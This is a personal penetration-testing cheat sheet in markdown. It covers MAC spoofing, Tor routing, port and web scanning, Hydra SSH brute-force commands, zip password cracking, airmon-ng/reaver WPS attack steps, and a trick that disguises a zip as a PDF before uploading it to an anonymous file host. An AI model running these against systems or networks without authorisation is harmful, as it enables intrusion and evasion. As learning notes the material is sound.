Skip to content

Latest commit

 

History

History
executable file
·
348 lines (304 loc) · 8.96 KB

pentest.md

File metadata and controls

executable file
·
348 lines (304 loc) · 8.96 KB
Raw

Pentest

trainings, tutors, interesting links

security cheat sheet open source software

Tools

  • http://www.mh-sec.de/downloads.html.en
  • Burp Suite
    • JSON Beautifier
    • Param miner
    • HTTP Request Smuggler
    • Backslash Powered Scanner
    • Reflected Parameters
    • Software Vulnerability Scanner
    • Java Deserialization Scanner
    • .Net Beautifier
    • Copy As Python-Request
    • Collaborator Everywhere
    • Custom Parameter Handler
    • Authmatrix
    • GraphQL Raider
    • Piper
    • JSON Web Token Attacker
    • InQl - Introspection GraphQL Scanner
  • :TODO: shodan

OS

Phone OS

Linux OS for phone

Linux OS for phone tools

Messengers

Discord: Use "https://play.google.com/store/apps/details?id=com.discord&hl=en" to find out more about Discord.

Free hosting

  1. 000WebHost
  2. InfinityFree
  3. AwardSpace
  4. GitHub Pages
  5. Netlify
  6. Wix
  7. WordPress
  8. SquareSpace

connection

change mac address

# list of devices
iw dev

# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0

list of all accessible wifi points

# force rescan 
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields 
nmcli -f ALL device wifi
# all fields with using in script 
nmcli -t -f ALL device wifi
nmcli -m multiline  -f ALL device wifi

# alternative way 
iwlist wlan0 scan 

# alternative way
iw wlan0 scan

# alternative way
sudo apt install wavemon

connect to selected network

# install tool
apt-get install wireless-tools wpasupplicant
# save password
wpa_passphrase YourSSID >> /etc/wpa_supplicant.conf

# check adapter
iwconfig
# connect to netowrk
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf

# sudo systemctl restart wpa_supplicant

check your current IP address

  • check ip address via proxy
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
  • check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'

activate tor connection

  • installation
sudo apt install tor
sudo apt install privoxy
  • configuration sudo vim /etc/privoxy/config
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
  • applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
  • check your ip afterwards
# via TOR 
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
  • stop, stop tor, stop private proxy
systemctl stop tor
systemctl status tor

systemctl stop privoxy
systemctl status privoxy

proxy

proxy list tools

https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/

Remote host analyzing

whois cli console whois

# apt install whois
whois google.com

scan ports

nmap -sV -p 1-65535 {hostname}

web scan

nikto -h {host name}

cms detector ContentManagementSystem detector

https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com

detect possible endpoints

[2ip.ru/cms](find cms)

/rotots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login

Request information

browser request headers, what browser sends

Remote host connection

Hydra

# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port> 
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port> 
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port> 

hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log

GSM

phone info

HLR request

sms

sms receive sms receive

e-mail

just create login & password

for changing manually - Cookies->https://temp-mail.org->email

after one day not possible to recover email address

files

zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
curl -i -F name=some-archive.pdf -F file=@archive.pdf https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf

archive

open zip with brute force zip

# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip

# statistic: 8 chars - 62 days

wifi

initiate monitor mode on interface

ifconfig 
# ( result - wlan0 )
airmon-ng check kill
airmon-ng check 
# ( should be empty )
airmon-ng start wlan0 
# ( result - wlan0mon )
airodump-ng wlan0mon 
# ( result - BSSID )
reaver -i wlan0mon -b <BSSID> -vv -K 1

md5sum, hash

https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/

android

android market

reverse engineering

apk to jar

apk to jar download

unzip -o ~/Downloads/dex2jar-2.1.zip -d ~/Downloads/

apk to jar use

APK_NAME=my_app
PATH_TO_APK="${APK_NAME}.apk"
PATH_TO_DEX2JAR=~/Downloads/dex-toos-2.1/d2j-dex2jar.sh

sh $PATH_TO_DEX2JAR -f $PATH_TO_APK
# result
ls -la "${APK_NAME}-dex2jar.jar"

jar to java

jar to java download

jar to java tool jar to java tool download

jar to java usage

java -jar jd-gui-1.6.6-min.jar

bitcoin

electrum wallet

sudo apt install python3-pip python3-setuptools python3-pyqt5 libsecp256k1-dev
ELECTRUM_VERSION=4.3.2 # https://download.electrum.org/
pip3 install https://download.electrum.org/${ELECTRUM_VERSION}/Electrum-${ELECTRUM_VERSION}.tar.gz#egg=electrum[fast]